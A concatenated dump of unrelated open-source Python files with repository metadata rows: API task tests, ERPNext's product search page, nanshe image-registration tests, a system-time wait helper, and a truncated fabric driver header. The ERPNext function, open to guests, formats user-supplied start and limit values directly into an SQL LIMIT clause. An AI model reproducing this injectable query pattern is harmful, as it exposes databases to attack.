task, _ = self._post_new_task(owner=TENANT3)
task_ids.append(task['id'])
# 2. GET /tasks
# Verify 3 tasks are returned
path = "/v2/tasks"
response, content = self.http.request(path, 'GET',
headers=minimal_task_headers())
self.assertEqual(200, response.status)
tasks = json.loads(content)['tasks']
self.assertEqual(3, len(tasks))
# 3. GET /tasks with limit of 2
# Verify only two tasks were returned
params = "limit=2"
path = "/v2/tasks?%s" % params
response, content = self.http.request(path, 'GET',
headers=minimal_task_headers())
self.assertEqual(200, response.status)
actual_tasks = json.loads(content)['tasks']
self.assertEqual(2, len(actual_tasks))
self.assertEqual(tasks[0]['id'], actual_tasks[0]['id'])
self.assertEqual(tasks[1]['id'], actual_tasks[1]['id'])
# 4. GET /tasks with marker
# Verify only two tasks were returned
params = "marker=%s" % tasks[0]['id']
path = "/v2/tasks?%s" % params
response, content = self.http.request(path, 'GET',
headers=minimal_task_headers())
self.assertEqual(200, response.status)
actual_tasks = json.loads(content)['tasks']
self.assertEqual(2, len(actual_tasks))
self.assertEqual(tasks[1]['id'], actual_tasks[0]['id'])
self.assertEqual(tasks[2]['id'], actual_tasks[1]['id'])
# 5. GET /tasks with marker and limit
# Verify only one task was returned with the correct id
params = "limit=1&marker=%s" % tasks[1]['id']
path = "/v2/tasks?%s" % params
response, content = self.http.request(path, 'GET',
headers=minimal_task_headers())
self.assertEqual(200, response.status)
actual_tasks = json.loads(content)['tasks']
self.assertEqual(1, len(actual_tasks))
self.assertEqual(tasks[2]['id'], actual_tasks[0]['id'])
# NOTE(nikhil): wait for all task executions to finish before exiting
# else there is a risk of running into deadlock
self._wait_on_task_execution()
def test_ordered_tasks(self):
# 0. GET /tasks
# Verify no tasks
path = "/v2/tasks"
response, content = self.http.request(path, 'GET',
headers=minimal_task_headers())
self.assertEqual(200, response.status)
tasks = json.loads(content)
self.assertFalse(tasks['tasks'])
task_ids = []
# 1. POST /tasks with three tasks with various attributes
task, _ = self._post_new_task(owner=TENANT1)
task_ids.append(task['id'])
task, _ = self._post_new_task(owner=TENANT2)
task_ids.append(task['id'])
task, _ = self._post_new_task(owner=TENANT3)
task_ids.append(task['id'])
# 2. GET /tasks with no query params
# Verify three tasks sorted by created_at desc
# 2. GET /tasks
# Verify 3 tasks are returned
path = "/v2/tasks"
response, content = self.http.request(path, 'GET',
headers=minimal_task_headers())
self.assertEqual(200, response.status)
actual_tasks = json.loads(content)['tasks']
self.assertEqual(3, len(actual_tasks))
self.assertEqual(task_ids[2], actual_tasks[0]['id'])
self.assertEqual(task_ids[1], actual_tasks[1]['id'])
self.assertEqual(task_ids[0], actual_tasks[2]['id'])
# 3. GET /tasks sorted by owner asc
params = 'sort_key=owner&sort_dir=asc'
path = '/v2/tasks?%s' % params
response, content = self.http.request(path, 'GET',
headers=minimal_task_headers())
self.assertEqual(200, response.status)
expected_task_owners = [TENANT1, TENANT2, TENANT3]
expected_task_owners.sort()
actual_tasks = json.loads(content)['tasks']
self.assertEqual(3, len(actual_tasks))
self.assertEqual(expected_task_owners,
[t['owner'] for t in actual_tasks])
# 4. GET /tasks sorted by owner desc with a marker
params = 'sort_key=owner&sort_dir=desc&marker=%s' % task_ids[0]
path = '/v2/tasks?%s' % params
response, content = self.http.request(path, 'GET',
headers=minimal_task_headers())
self.assertEqual(200, response.status)
actual_tasks = json.loads(content)['tasks']
self.assertEqual(2, len(actual_tasks))
self.assertEqual(task_ids[2], actual_tasks[0]['id'])
self.assertEqual(task_ids[1], actual_tasks[1]['id'])
self.assertEqual(TENANT3, actual_tasks[0]['owner'])
self.assertEqual(TENANT2, actual_tasks[1]['owner'])
# 5. GET /tasks sorted by owner asc with a marker
params = 'sort_key=owner&sort_dir=asc&marker=%s' % task_ids[0]
path = '/v2/tasks?%s' % params
response, content = self.http.request(path, 'GET',
headers=minimal_task_headers())
self.assertEqual(200, response.status)
actual_tasks = json.loads(content)['tasks']
self.assertEqual(0, len(actual_tasks))
# NOTE(nikhil): wait for all task executions to finish before exiting
# else there is a risk of running into deadlock
self._wait_on_task_execution()
def test_delete_task(self):
# 0. POST /tasks
# Create a new task with valid input and type
task_data = _new_task_fixture()
task_owner = 'tenant1'
body_content = json.dumps(task_data)
path = "/v2/tasks"
response, content = self.http.request(
path, 'POST', headers=minimal_task_headers(task_owner),
body=body_content)
self.assertEqual(201, response.status)
data = json.loads(content)
task_id = data['id']
# 1. DELETE on /tasks/{task_id}
# Attempt to delete a task
path = "/v2/tasks/%s" % task_id
response, content = self.http.request(path,
'DELETE',
headers=minimal_task_headers())
self.assertEqual(405, response.status)
self.assertEqual('GET', response.webob_resp.headers.get('Allow'))
self.assertEqual(('GET',), response.webob_resp.allow)
self.assertEqual(('GET',), response.allow)
# 2. GET /tasks/{task_id}
# Ensure that methods mentioned in the Allow header work
path = "/v2/tasks/%s" % task_id
response, content = self.http.request(path,
'GET',
headers=minimal_task_headers())
self.assertEqual(200, response.status)
self.assertIsNotNone(content)
# NOTE(nikhil): wait for all task executions to finish before exiting
# else there is a risk of running into deadlock
self._wait_on_task_execution()
| apache-2.0 | 8,380,838,150,023,207,000 | 35.352087 | 79 | 0.565202 | false |
ThiagoGarciaAlves/erpnext | erpnext/templates/pages/product_search.py | 29 | 1184 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.utils import cstr
from erpnext.setup.doctype.item_group.item_group import get_item_for_list_in_html
no_cache = 1
no_sitemap = 1
@frappe.whitelist(allow_guest=True)
def get_product_list(search=None, start=0, limit=10):
# base query
query = """select name, item_name, page_name, website_image, item_group,
web_long_description as website_description, parent_website_route
from `tabItem` where show_in_website = 1"""
# search term condition
if search:
query += """ and (web_long_description like %(search)s
or description like %(search)s
or item_name like %(search)s
or name like %(search)s)"""
search = "%" + cstr(search) + "%"
# order by
query += """ order by weightage desc, modified desc limit %s, %s""" % (start, limit)
data = frappe.db.sql(query, {
"search": search,
}, as_dict=1)
for d in data:
d.route = ((d.parent_website_route + "/") if d.parent_website_route else "") \
+ d.page_name
return [get_item_for_list_in_html(r) for r in data]
| agpl-3.0 | -3,131,648,091,549,166,000 | 29.358974 | 85 | 0.688345 | false |
jakirkham/nanshe | tests/test_nanshe/test_imp/test_registration.py | 3 | 24055 | __author__ = "John Kirkham <[email protected]>"
__date__ = "$Feb 20, 2015 10:40:15 EST$"
import nose
import nose.plugins
import nose.plugins.attrib
import os
import shutil
import tempfile
import h5py
import numpy
import nanshe.io.hdf5.serializers
import nanshe.imp.registration
from past.builtins import basestring
class TestRegisterMeanOffsets(object):
def test0a(self):
a = numpy.zeros((20,10,11), dtype=int)
a[:, 3:-3, 3:-3] = 1
b = numpy.ma.masked_array(a.copy())
b2 = nanshe.imp.registration.register_mean_offsets(a)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
def test1a(self):
a = numpy.zeros((20,10,11), dtype=int)
a[:, 3:-3, 3:-3] = 1
b = numpy.ma.masked_array(a.copy())
a[10] = 0
a[10, :-6, :-6] = 1
b[10, :, :3] = numpy.ma.masked
b[10, :3, :] = numpy.ma.masked
b2 = nanshe.imp.registration.register_mean_offsets(a)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
def test2a(self):
a = numpy.zeros((20,11,12), dtype=int)
a[:, 3:-4, 3:-4] = 1
b = numpy.ma.masked_array(a.copy())
a[10] = 0
a[10, :-7, :-7] = 1
b[10, :, :3] = numpy.ma.masked
b[10, :3, :] = numpy.ma.masked
b2 = nanshe.imp.registration.register_mean_offsets(a)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
def test3a(self):
a = numpy.zeros((20,10,11), dtype=int)
a[:, 3:-3, 3:-3] = 1
b = numpy.ma.masked_array(a.copy())
fn = nanshe.imp.registration.register_mean_offsets(
a, block_frame_length=10
)
b2 = None
with h5py.File(fn, "r") as f:
b2g = f["reg_frames"]
b2d = nanshe.io.hdf5.serializers.HDF5MaskedDataset(b2g)
b2 = b2d[...]
os.remove(fn)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
def test4a(self):
a = numpy.zeros((20,10,11), dtype=int)
a[:, 3:-3, 3:-3] = 1
b = numpy.ma.masked_array(a.copy())
a[10] = 0
a[10, :-6, :-6] = 1
b[10, :, :3] = numpy.ma.masked
b[10, :3, :] = numpy.ma.masked
fn = nanshe.imp.registration.register_mean_offsets(
a, block_frame_length=10
)
b2 = None
with h5py.File(fn, "r") as f:
b2g = f["reg_frames"]
b2d = nanshe.io.hdf5.serializers.HDF5MaskedDataset(b2g)
b2 = b2d[...]
os.remove(fn)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
def test5a(self):
a = numpy.zeros((20,11,12), dtype=int)
a[:, 3:-4, 3:-4] = 1
b = numpy.ma.masked_array(a.copy())
a[10] = 0
a[10, :-7, :-7] = 1
b[10, :, :3] = numpy.ma.masked
b[10, :3, :] = numpy.ma.masked
fn = nanshe.imp.registration.register_mean_offsets(
a, block_frame_length=10
)
b2 = None
with h5py.File(fn, "r") as f:
b2g = f["reg_frames"]
b2d = nanshe.io.hdf5.serializers.HDF5MaskedDataset(b2g)
b2 = b2d[...]
os.remove(fn)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
def test6a(self):
a = numpy.zeros((20,10,11), dtype=int)
a[:, 3:-3, 3:-3] = 1
b = numpy.ma.masked_array(a.copy())
fn = nanshe.imp.registration.register_mean_offsets(
a, block_frame_length=7
)
b2 = None
with h5py.File(fn, "r") as f:
b2g = f["reg_frames"]
b2d = nanshe.io.hdf5.serializers.HDF5MaskedDataset(b2g)
b2 = b2d[...]
os.remove(fn)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
def test7a(self):
a = numpy.zeros((20,10,11), dtype=int)
a[:, 3:-3, 3:-3] = 1
b = numpy.ma.masked_array(a.copy())
a[10] = 0
a[10, :-6, :-6] = 1
b[10, :, :3] = numpy.ma.masked
b[10, :3, :] = numpy.ma.masked
fn = nanshe.imp.registration.register_mean_offsets(
a, block_frame_length=7
)
b2 = None
with h5py.File(fn, "r") as f:
b2g = f["reg_frames"]
b2d = nanshe.io.hdf5.serializers.HDF5MaskedDataset(b2g)
b2 = b2d[...]
os.remove(fn)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
def test8a(self):
a = numpy.zeros((20,11,12), dtype=int)
a[:, 3:-4, 3:-4] = 1
b = numpy.ma.masked_array(a.copy())
a[10] = 0
a[10, :-7, :-7] = 1
b[10, :, :3] = numpy.ma.masked
b[10, :3, :] = numpy.ma.masked
fn = nanshe.imp.registration.register_mean_offsets(
a, block_frame_length=7
)
b2 = None
with h5py.File(fn, "r") as f:
b2g = f["reg_frames"]
b2d = nanshe.io.hdf5.serializers.HDF5MaskedDataset(b2g)
b2 = b2d[...]
os.remove(fn)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
def test9a(self):
a = numpy.zeros((20,10,11), dtype=int)
a[:, 3:-3, 3:-3] = 1
b = numpy.ma.masked_array(a.copy())
fn = nanshe.imp.registration.register_mean_offsets(
a, block_frame_length=30
)
b2 = None
with h5py.File(fn, "r") as f:
b2g = f["reg_frames"]
b2d = nanshe.io.hdf5.serializers.HDF5MaskedDataset(b2g)
b2 = b2d[...]
os.remove(fn)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
def test10a(self):
a = numpy.zeros((20,10,11), dtype=int)
a[:, 3:-3, 3:-3] = 1
b = numpy.ma.masked_array(a.copy())
a[10] = 0
a[10, :-6, :-6] = 1
b[10, :, :3] = numpy.ma.masked
b[10, :3, :] = numpy.ma.masked
fn = nanshe.imp.registration.register_mean_offsets(
a, block_frame_length=30
)
b2 = None
with h5py.File(fn, "r") as f:
b2g = f["reg_frames"]
b2d = nanshe.io.hdf5.serializers.HDF5MaskedDataset(b2g)
b2 = b2d[...]
os.remove(fn)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
def test11a(self):
a = numpy.zeros((20,11,12), dtype=int)
a[:, 3:-4, 3:-4] = 1
b = numpy.ma.masked_array(a.copy())
a[10] = 0
a[10, :-7, :-7] = 1
b[10, :, :3] = numpy.ma.masked
b[10, :3, :] = numpy.ma.masked
fn = nanshe.imp.registration.register_mean_offsets(
a, block_frame_length=30
)
b2 = None
with h5py.File(fn, "r") as f:
b2g = f["reg_frames"]
b2d = nanshe.io.hdf5.serializers.HDF5MaskedDataset(b2g)
b2 = b2d[...]
os.remove(fn)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
def test12a(self):
cwd = os.getcwd()
temp_dir = ""
try:
temp_dir = tempfile.mkdtemp()
os.chdir(temp_dir)
with h5py.File("in.h5", "w") as f:
a = f.create_dataset(
"a", shape=(20, 11, 12), dtype=int, chunks=True
)
a[:, 3:-4, 3:-4] = 1
b = numpy.ma.masked_array(a[...])
a[10] = 0
a[10, :-7, :-7] = 1
b[10, :, :3] = numpy.ma.masked
b[10, :3, :] = numpy.ma.masked
fn = nanshe.imp.registration.register_mean_offsets(
a, block_frame_length=7
)
assert isinstance(fn, basestring)
assert os.path.exists(fn)
b2 = None
with h5py.File(fn, "r") as f:
b2g = f["reg_frames"]
b2d = nanshe.io.hdf5.serializers.HDF5MaskedDataset(b2g)
b2 = b2d[...]
os.remove(fn)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
finally:
os.chdir(cwd)
if temp_dir:
shutil.rmtree(temp_dir)
def test13a(self):
a = numpy.zeros((20,10,11), dtype=int)
a[:, 3:-3, 3:-3] = 1
b = numpy.ma.masked_array(a.copy())
a[10] = 0
a[10, :-6, :-6] = 1
b[10, :, :3] = numpy.ma.masked
b[10, :3, :] = numpy.ma.masked
b2 = nanshe.imp.registration.register_mean_offsets(
a, float_type=numpy.float32
)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
def test14a(self):
a = numpy.zeros((20,10,11), dtype=int)
a[:, 3:-3, 3:-3] = 1
b = numpy.ma.masked_array(a.copy())
a[10] = 0
a[10, :-6, :-6] = 1
b[10, :, :3] = numpy.ma.masked
b[10, :3, :] = numpy.ma.masked
b2 = nanshe.imp.registration.register_mean_offsets(
a, float_type="float32"
)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
@nose.plugins.attrib.attr("3D")
def test0b(self):
a = numpy.zeros((20,10,11,12), dtype=int)
a[:, 3:-3, 3:-3, 3:-3] = 1
b = numpy.ma.masked_array(a.copy())
b2 = nanshe.imp.registration.register_mean_offsets(a)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
@nose.plugins.attrib.attr("3D")
def test1b(self):
a = numpy.zeros((20,10,11,12), dtype=int)
a[:, 3:-3, 3:-3, 3:-3] = 1
b = numpy.ma.masked_array(a.copy())
a[10] = 0
a[10, :-6, :-6, :-6] = 1
b[10, :3, :, :] = numpy.ma.masked
b[10, :, :3, :] = numpy.ma.masked
b[10, :, :, :3] = numpy.ma.masked
b2 = nanshe.imp.registration.register_mean_offsets(a)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
@nose.plugins.attrib.attr("3D")
def test2b(self):
a = numpy.zeros((20,11,12,13), dtype=int)
a[:, 3:-4, 3:-4, 3:-4] = 1
b = numpy.ma.masked_array(a.copy())
a[10] = 0
a[10, :-7, :-7, :-7] = 1
b[10, :3, :, :] = numpy.ma.masked
b[10, :, :3, :] = numpy.ma.masked
b[10, :, :, :3] = numpy.ma.masked
b2 = nanshe.imp.registration.register_mean_offsets(a)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
@nose.plugins.attrib.attr("3D")
def test3b(self):
a = numpy.zeros((20,10,11,12), dtype=int)
a[:, 3:-3, 3:-3, 3:-3] = 1
b = numpy.ma.masked_array(a.copy())
fn = nanshe.imp.registration.register_mean_offsets(
a, block_frame_length=10
)
b2 = None
with h5py.File(fn, "r") as f:
b2g = f["reg_frames"]
b2d = nanshe.io.hdf5.serializers.HDF5MaskedDataset(b2g)
b2 = b2d[...]
os.remove(fn)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
@nose.plugins.attrib.attr("3D")
def test4b(self):
a = numpy.zeros((20,10,11,12), dtype=int)
a[:, 3:-3, 3:-3, 3:-3] = 1
b = numpy.ma.masked_array(a.copy())
a[10] = 0
a[10, :-6, :-6, :-6] = 1
b[10, :3, :, :] = numpy.ma.masked
b[10, :, :3, :] = numpy.ma.masked
b[10, :, :, :3] = numpy.ma.masked
fn = nanshe.imp.registration.register_mean_offsets(
a, block_frame_length=10
)
b2 = None
with h5py.File(fn, "r") as f:
b2g = f["reg_frames"]
b2d = nanshe.io.hdf5.serializers.HDF5MaskedDataset(b2g)
b2 = b2d[...]
os.remove(fn)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
@nose.plugins.attrib.attr("3D")
def test5b(self):
a = numpy.zeros((20,11,12,13), dtype=int)
a[:, 3:-4, 3:-4, 3:-4] = 1
b = numpy.ma.masked_array(a.copy())
a[10] = 0
a[10, :-7, :-7, :-7] = 1
b[10, :3, :, :] = numpy.ma.masked
b[10, :, :3, :] = numpy.ma.masked
b[10, :, :, :3] = numpy.ma.masked
fn = nanshe.imp.registration.register_mean_offsets(
a, block_frame_length=10
)
b2 = None
with h5py.File(fn, "r") as f:
b2g = f["reg_frames"]
b2d = nanshe.io.hdf5.serializers.HDF5MaskedDataset(b2g)
b2 = b2d[...]
os.remove(fn)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
@nose.plugins.attrib.attr("3D")
def test6b(self):
a = numpy.zeros((20,10,11,12), dtype=int)
a[:, 3:-3, 3:-3, 3:-3] = 1
b = numpy.ma.masked_array(a.copy())
fn = nanshe.imp.registration.register_mean_offsets(
a, block_frame_length=7
)
b2 = None
with h5py.File(fn, "r") as f:
b2g = f["reg_frames"]
b2d = nanshe.io.hdf5.serializers.HDF5MaskedDataset(b2g)
b2 = b2d[...]
os.remove(fn)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
@nose.plugins.attrib.attr("3D")
def test7b(self):
a = numpy.zeros((20,10,11,12), dtype=int)
a[:, 3:-3, 3:-3, 3:-3] = 1
b = numpy.ma.masked_array(a.copy())
a[10] = 0
a[10, :-6, :-6, :-6] = 1
b[10, :3, :, :] = numpy.ma.masked
b[10, :, :3, :] = numpy.ma.masked
b[10, :, :, :3] = numpy.ma.masked
fn = nanshe.imp.registration.register_mean_offsets(
a, block_frame_length=7
)
b2 = None
with h5py.File(fn, "r") as f:
b2g = f["reg_frames"]
b2d = nanshe.io.hdf5.serializers.HDF5MaskedDataset(b2g)
b2 = b2d[...]
os.remove(fn)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
@nose.plugins.attrib.attr("3D")
def test8b(self):
a = numpy.zeros((20,11,12,13), dtype=int)
a[:, 3:-4, 3:-4, 3:-4] = 1
b = numpy.ma.masked_array(a.copy())
a[10] = 0
a[10, :-7, :-7, :-7] = 1
b[10, :3, :, :] = numpy.ma.masked
b[10, :, :3, :] = numpy.ma.masked
b[10, :, :, :3] = numpy.ma.masked
fn = nanshe.imp.registration.register_mean_offsets(
a, block_frame_length=7
)
b2 = None
with h5py.File(fn, "r") as f:
b2g = f["reg_frames"]
b2d = nanshe.io.hdf5.serializers.HDF5MaskedDataset(b2g)
b2 = b2d[...]
os.remove(fn)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
@nose.plugins.attrib.attr("3D")
def test9b(self):
a = numpy.zeros((20,10,11,12), dtype=int)
a[:, 3:-3, 3:-3, 3:-3] = 1
b = numpy.ma.masked_array(a.copy())
fn = nanshe.imp.registration.register_mean_offsets(
a, block_frame_length=30
)
b2 = None
with h5py.File(fn, "r") as f:
b2g = f["reg_frames"]
b2d = nanshe.io.hdf5.serializers.HDF5MaskedDataset(b2g)
b2 = b2d[...]
os.remove(fn)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
@nose.plugins.attrib.attr("3D")
def test10b(self):
a = numpy.zeros((20,10,11,12), dtype=int)
a[:, 3:-3, 3:-3, 3:-3] = 1
b = numpy.ma.masked_array(a.copy())
a[10] = 0
a[10, :-6, :-6, :-6] = 1
b[10, :3, :, :] = numpy.ma.masked
b[10, :, :3, :] = numpy.ma.masked
b[10, :, :, :3] = numpy.ma.masked
fn = nanshe.imp.registration.register_mean_offsets(
a, block_frame_length=30
)
b2 = None
with h5py.File(fn, "r") as f:
b2g = f["reg_frames"]
b2d = nanshe.io.hdf5.serializers.HDF5MaskedDataset(b2g)
b2 = b2d[...]
os.remove(fn)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
@nose.plugins.attrib.attr("3D")
def test11b(self):
a = numpy.zeros((20,11,12,13), dtype=int)
a[:, 3:-4, 3:-4, 3:-4] = 1
b = numpy.ma.masked_array(a.copy())
a[10] = 0
a[10, :-7, :-7, :-7] = 1
b[10, :3, :, :] = numpy.ma.masked
b[10, :, :3, :] = numpy.ma.masked
b[10, :, :, :3] = numpy.ma.masked
fn = nanshe.imp.registration.register_mean_offsets(
a, block_frame_length=30
)
b2 = None
with h5py.File(fn, "r") as f:
b2g = f["reg_frames"]
b2d = nanshe.io.hdf5.serializers.HDF5MaskedDataset(b2g)
b2 = b2d[...]
os.remove(fn)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
@nose.plugins.attrib.attr("3D")
def test12b(self):
cwd = os.getcwd()
temp_dir = ""
try:
temp_dir = tempfile.mkdtemp()
os.chdir(temp_dir)
with h5py.File("in.h5", "w") as f:
a = f.create_dataset(
"a", shape=(20, 11, 12, 13), dtype=int, chunks=True
)
a[:, 3:-4, 3:-4, 3:-4] = 1
b = numpy.ma.masked_array(a[...])
a[10] = 0
a[10, :-7, :-7, :-7] = 1
b[10, :3, :, :] = numpy.ma.masked
b[10, :, :3, :] = numpy.ma.masked
b[10, :, :, :3] = numpy.ma.masked
fn = nanshe.imp.registration.register_mean_offsets(
a, block_frame_length=7
)
assert isinstance(fn, basestring)
assert os.path.exists(fn)
b2 = None
with h5py.File(fn, "r") as f:
b2g = f["reg_frames"]
b2d = nanshe.io.hdf5.serializers.HDF5MaskedDataset(b2g)
b2 = b2d[...]
os.remove(fn)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
finally:
os.chdir(cwd)
if temp_dir:
shutil.rmtree(temp_dir)
@nose.plugins.attrib.attr("3D")
def test13b(self):
a = numpy.zeros((20,10,11,12), dtype=int)
a[:, 3:-4, 3:-4, 3:-4] = 1
b = numpy.ma.masked_array(a.copy())
a[10] = 0
a[10, :-7, :-7, :-7] = 1
b[10, :3, :, :] = numpy.ma.masked
b[10, :, :3, :] = numpy.ma.masked
b[10, :, :, :3] = numpy.ma.masked
b2 = nanshe.imp.registration.register_mean_offsets(
a, float_type=numpy.float32
)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
@nose.plugins.attrib.attr("3D")
def test14b(self):
a = numpy.zeros((20,10,11,12), dtype=int)
a[:, 3:-4, 3:-4, 3:-4] = 1
b = numpy.ma.masked_array(a.copy())
a[10] = 0
a[10, :-7, :-7, :-7] = 1
b[10, :3, :, :] = numpy.ma.masked
b[10, :, :3, :] = numpy.ma.masked
b[10, :, :, :3] = numpy.ma.masked
b2 = nanshe.imp.registration.register_mean_offsets(
a, float_type="float32"
)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
class TestFindOffsets(object):
def test0a(self):
a = numpy.zeros((20,10,11), dtype=int)
a_off = numpy.zeros((len(a), a.ndim-1), dtype=int)
a[:, 3:-3, 3:-3] = 1
am = a.mean(axis=0)
af = numpy.fft.fftn(a, axes=range(1, a.ndim))
amf = numpy.fft.fftn(am, axes=range(am.ndim))
a_off2 = nanshe.imp.registration.find_offsets(af, amf)
assert (a_off2.dtype == a_off.dtype)
assert (a_off2 == a_off).all()
def test1a(self):
a = numpy.zeros((20,10,11), dtype=int)
a_off = numpy.zeros((len(a), a.ndim-1), dtype=int)
a[:, 3:-3, 3:-3] = 1
a[10] = 0
a[10, :-6, :-6] = 1
a_off[10] = a.shape[1:]
a_off[10] -= 3
numpy.negative(a_off, out=a_off)
am = a.mean(axis=0)
af = numpy.fft.fftn(a, axes=range(1, a.ndim))
amf = numpy.fft.fftn(am, axes=range(am.ndim))
a_off2 = nanshe.imp.registration.find_offsets(af, amf)
assert (a_off2.dtype == a_off.dtype)
assert (a_off2 == a_off).all()
def test2a(self):
a = numpy.zeros((20,11,12), dtype=int)
a_off = numpy.zeros((len(a), a.ndim-1), dtype=int)
a[:, 3:-4, 3:-4] = 1
a[10] = 0
a[10, :-7, :-7] = 1
a_off[10] = a.shape[1:]
a_off[10] -= 3
numpy.negative(a_off, out=a_off)
am = a.mean(axis=0)
af = numpy.fft.fftn(a, axes=range(1, a.ndim))
amf = numpy.fft.fftn(am, axes=range(am.ndim))
a_off2 = nanshe.imp.registration.find_offsets(af, amf)
assert (a_off2.dtype == a_off.dtype)
assert (a_off2 == a_off).all()
@nose.plugins.attrib.attr("3D")
def test0b(self):
a = numpy.zeros((20,10,11,12), dtype=int)
a_off = numpy.zeros((len(a), a.ndim-1), dtype=int)
a[:, 3:-3, 3:-3, 3:-3] = 1
am = a.mean(axis=0)
af = numpy.fft.fftn(a, axes=range(1, a.ndim))
amf = numpy.fft.fftn(am, axes=range(am.ndim))
a_off2 = nanshe.imp.registration.find_offsets(af, amf)
assert (a_off2.dtype == a_off.dtype)
assert (a_off2 == a_off).all()
@nose.plugins.attrib.attr("3D")
def test1b(self):
a = numpy.zeros((20,10,11,12), dtype=int)
a_off = numpy.zeros((len(a), a.ndim-1), dtype=int)
a[:, 3:-3, 3:-3, 3:-3] = 1
a[10] = 0
a[10, :-6, :-6, :-6] = 1
a_off[10] = a.shape[1:]
a_off[10] -= 3
numpy.negative(a_off, out=a_off)
am = a.mean(axis=0)
af = numpy.fft.fftn(a, axes=range(1, a.ndim))
amf = numpy.fft.fftn(am, axes=range(am.ndim))
a_off2 = nanshe.imp.registration.find_offsets(af, amf)
assert (a_off2.dtype == a_off.dtype)
assert (a_off2 == a_off).all()
@nose.plugins.attrib.attr("3D")
def test2b(self):
a = numpy.zeros((20,11,12,13), dtype=int)
a_off = numpy.zeros((len(a), a.ndim-1), dtype=int)
a[:, 3:-4, 3:-4, 3:-4] = 1
a[10] = 0
a[10, :-7, :-7, :-7] = 1
a_off[10] = a.shape[1:]
a_off[10] -= 3
numpy.negative(a_off, out=a_off)
am = a.mean(axis=0)
af = numpy.fft.fftn(a, axes=range(1, a.ndim))
amf = numpy.fft.fftn(am, axes=range(am.ndim))
a_off2 = nanshe.imp.registration.find_offsets(af, amf)
assert (a_off2.dtype == a_off.dtype)
assert (a_off2 == a_off).all()
| bsd-3-clause | -677,713,587,896,744,800 | 24.214885 | 71 | 0.476491 | false |
gary-pickens/HouseMonitor | housemonitor/lib/waitforsystemtime.py | 1 | 1545 | '''
Created on Dec 14, 2013
@author: gary
'''
from datetime import datetime
import time
class WaitForSystemTime( object ):
'''
When HouseMonitor is starting at boot time, the NTP (Network
Time Protocol) has not set the time yet. This class delays
the start until the system time has been set.
'''
HOUSEMONITOR_EPOCH_TIME = datetime( 2012, 9, 10, 0, 0, 0 )
WAIT_FOR_SYSTEM_TIME = 15
def __init__( self, sleep=time.sleep ):
'''
Initialize WaitForSystemTime.
:param sleep: For unit test. Used for injecting a mock sleep.
:type function
'''
super( WaitForSystemTime, self ).__init__()
self.sleep = sleep
def validSystemTime( self, now=datetime.now() ):
'''
Test if system time has been set. When first booted it is
set to the UNIX epoch which is January 1 1970. After NTP has
set the time it is after housemonitor epoch time(Sept 10, 2012)
:param now: For unit test. Used for injecting a mock now.
:type function
'''
if ( now < self.HOUSEMONITOR_EPOCH_TIME ):
print( 'waiting for system time to be set: {}'.format( now ) )
self.sleep( self.WAIT_FOR_SYSTEM_TIME )
return False
else:
return True
def wait( self ):
'''
Wait for system time to be set.
'''
valid_system_time = False
while not valid_system_time:
valid_system_time = self.validSystemTime( datetime.now() )
| mit | -6,216,288,742,393,243,000 | 27.090909 | 74 | 0.594175 | false |
prmtl/fuel-web | fuel_agent_ci/fuel_agent_ci/drivers/fabric_driver.py | 4 | 4071 | # Copyright 2014 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
import sys
import tempfile
from fabric import api as fab
